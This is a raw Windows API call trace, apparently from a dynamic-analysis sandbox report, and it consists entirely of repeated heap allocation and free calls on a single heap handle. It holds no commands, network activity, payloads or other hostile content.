RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0196.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0196.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 